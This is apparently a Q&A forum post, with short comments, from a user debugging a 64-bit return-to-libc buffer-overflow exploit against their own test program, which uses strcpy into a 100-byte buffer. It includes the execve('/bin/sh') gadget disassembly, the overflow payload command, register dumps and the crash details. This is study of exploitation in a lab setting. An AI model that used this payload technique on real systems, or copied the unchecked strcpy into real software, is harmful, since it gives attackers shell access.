Problem with return 2 libc in 64 bit arch

Question

I want to perform return to libc in 64 bit architecture using execve. I found a gadget with /bin/sh in it (the /bin/sh offset is 18a143):

   cbcd8:       00 00 
   cbcda:       4c 89 ea                mov    rdx,r13
   cbcdd:       4c 89 e6                mov    rsi,r12
   cbce0:       48 8d 3d 5c e4 0b 00    lea    rdi,[rip+0xbe45c]        # 18a143 <_libc_intl_domainname@@GLIBC_2.2.5+0x17e>
   cbce7:       e8 94 f9 ff ff          call   cb680 <execve@@GLIBC_2.2.5>
--
   cbd92:       48 85 c0                test   rax,rax

now I fill the return address (RIP) with (address of libc + 0xcbce0) with this payload:

r $(python -c 'print "A"*120 + {libc+0xcbce0}')

120 means 100 byte buffer + 12 byte alignment + 8 byte RBP. Here are the registers:

RAX: 0xffffffffffffffff 
RBX: 0x0 
RCX: 0xffffffffffffff80 
RDX: 0x0 
RSI: 0x555555555060 (<_start>:  xor    ebp,ebp)
RDI: 0x7ffff7f79143 --> 0x68732f6e69622f ('/bin/sh')
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x0 
RIP: 0x7ffff7ebacef (<maybe_script_execute+175>:        mov    rax,QWORD PTR [rbp-0x28])
R8 : 0xffffffff 
R9 : 0x8a 
R10: 0x7fffffffdfb0 ('A' <repeats 120 times>, "\354\254\353\367\377\177")
R11: 0x202 
R12: 0x555555555060 (<_start>:  xor    ebp,ebp)
R13: 0x0 
R14: 0x0 
R15: 0x0

and here are tho codes around execve:

 0x7ffff7ebace0 <maybe_script_execute+160>:   lea    rdi,[rip+0xbe45c]        # 0x7ffff7f79143
   0x7ffff7ebace7 <maybe_script_execute+167>:   call   0x7ffff7eba680 <execve>
   0x7ffff7ebacec <maybe_script_execute+172>:   mov    rsp,rbx
 0x7ffff7ebacef <maybe_script_execute+175>:   mov    rax,QWORD PTR [rbp-0x28]
   0x7ffff7ebacf3 <maybe_script_execute+179>:   sub    rax,QWORD PTR fs:0x28
   0x7ffff7ebacfc <maybe_script_execute+188>:   jne    0x7ffff7ebad4b <maybe_script_execute+267>
   0x7ffff7ebacfe <maybe_script_execute+190>:   lea    rsp,[rbp-0x18]
   0x7ffff7ebad02 <maybe_script_execute+194>:   pop    rbx

Here is the instruction where the crash occurs:

0x7ffff7ebacef <maybe_script_execute+175>:   mov    rax,QWORD PTR [rbp-0x28]

At this point in time, it says $SP=0, which is invalid.

and my dummy source code:

#include<stdio.h>
#include<string.h>
int main(int argc, char *argv[])
{
char buf[100];
strcpy(buf,argv[1]);
printf("%s\n",buf);
return 0;
}

but it not works and gives Bus Error.

Stopped reason: SIGBUS
0x00007ffff7ebacef in maybe_script_execute (file=<optimized out>, argv=<optimized out>, envp=0x0) at execvpe.c:67
67      execvpe.c: No such file or directory

@multithr3at3d 0x7ffff7ebacef : mov rax,QWORD PTR [rbp-0x28] and it says $SP=0 and so invalid. — Napirochism Napirochism, Sep 09 '20 at 09:59
@multithr3at3d after calling execve. 0x7ffff7ebacec : mov rsp,rbx. I think execve not works or its args are not properly set. if you see the RSI not sets to 0. — Napirochism Napirochism, Sep 09 '20 at 15:10
@multithr3at3d I set rsi to 0 with gdb before jump to execve and it works but it's not my purpose :( — Napirochism Napirochism, Sep 09 '20 at 16:35
Looks like the execve is working then since you are getting past it; no need to prevent it from crashing afterwards in this case. Perhaps you aren't interacting with the shell properly? https://security.stackexchange.com/q/155844/90657 — multithr3at3d, Sep 09 '20 at 21:36

Problem with return 2 libc in 64 bit arch

0 Answers0